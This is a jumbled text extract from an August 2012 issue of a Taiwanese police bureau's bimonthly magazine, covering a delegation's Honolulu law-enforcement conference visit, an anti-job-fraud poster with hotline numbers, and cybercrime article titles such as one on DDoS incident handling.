罪執行成效深感興趣，頻頻發問，並問及駐港人員有

無將此案例轉報該局總部知悉等情，雙方會談氣氛融

洽，會後互贈禮品及合影留念，同時邀請該室人員來

局參訪。

拜會美國移民暨海關執法局駐檀香山辦公室。

與ICE主管Wayne K.Wills互贈禮品。

與FBI駐檀香山辦公室主管Robert Jones互贈禮品。

72


隨著全球化的發展，犯罪已

無國界之分，共同打擊跨國犯罪，

已成為國際執法機關合作的主要趨

勢，而積極參與國際執法及警政交

流實為促進跨國合作共同打擊犯罪

的重要途徑。

本次第9屆亞裔年會，由楊副

局長率同駐美聯絡組邱俊誠及筆者

等3人共同參與，期間與美國聯邦

調查局、秘勤局、移民暨海關執法

局、檀香市警察局及亞洲國家等執

法機關代表密切交流。同時，從全

美各地及亞洲國家經驗豐富的執法

人員、學者、專家經驗分享與研討

中，了解當前跨國犯罪趨勢及變

化、亞裔組織犯罪及幫派

問題、恐怖主義發展最新

情勢以及全球犯罪鑑識技

術等，對於本局未來研擬

犯罪防制對策及掌握國際

鑑識技術趨勢甚有幫助，並透過此

會議所提供的良好平臺，與美國及

亞洲國家執法人員進行經驗交流與

相互學習，成果豐碩。

近年來本局為積極拓展國際視

野及增加跨國執法能力，除推動建

立駐外警察聯絡官制度，派遣聯絡

官於駐在國進行執法合作及警政交

流外，並持續參與有關警政與執法

交流之國際性會議與研習，以汲取

國外專業打擊犯罪新知，並透過與

會人員相互交流及學習，從而提升

專業技能，強化打擊犯罪能量，相

信對日後合作偵辦跨國犯罪案件，

及提升本局在國際間之聲望均有極

大助益。

72這次來夏威夷真不虛此行啊！

參訪下來，訪團成員們都覺得收穫良多。

本局績優同仁榮獲行政院陳院長頒獎。

101年全國反毒會議於101年6月3日舉行，











七不原則記在心

求職詐騙難靠近

求職面試堅持

不繳錢、不購買、

不辦卡、不簽約、

證件不離身、

不飲酒及他人提供之不明飲料、

不非法工作

MEMO

如遇詐騙求職速速撥打165反詐騙專線讓騙子老闆無所遁形！

反詐騙諮詢專線：165、110免費報案專線：0800-211-511全國消費者服務專線：1950內政部警政署刑事警察局反詐騙網站

h t t p : / / w w w . 1 6 5 . g o v . t w

電子郵件來源解析


人際脈絡工具分析探討網路犯罪─


DDoS攻擊事件處理

與國際合作之省思


科技警網

網路犯罪VS

封面故事

49

刑事雙月刊

49 雙月刊


中華民國101年8月 http://www.cib.gov.tw

B I M O N T H L Y


中華民國

年

月出版

8

科技警網VS網路犯罪

101

科技警網 vs - 內政部警政署刑事警察局全球資訊網中...

Documents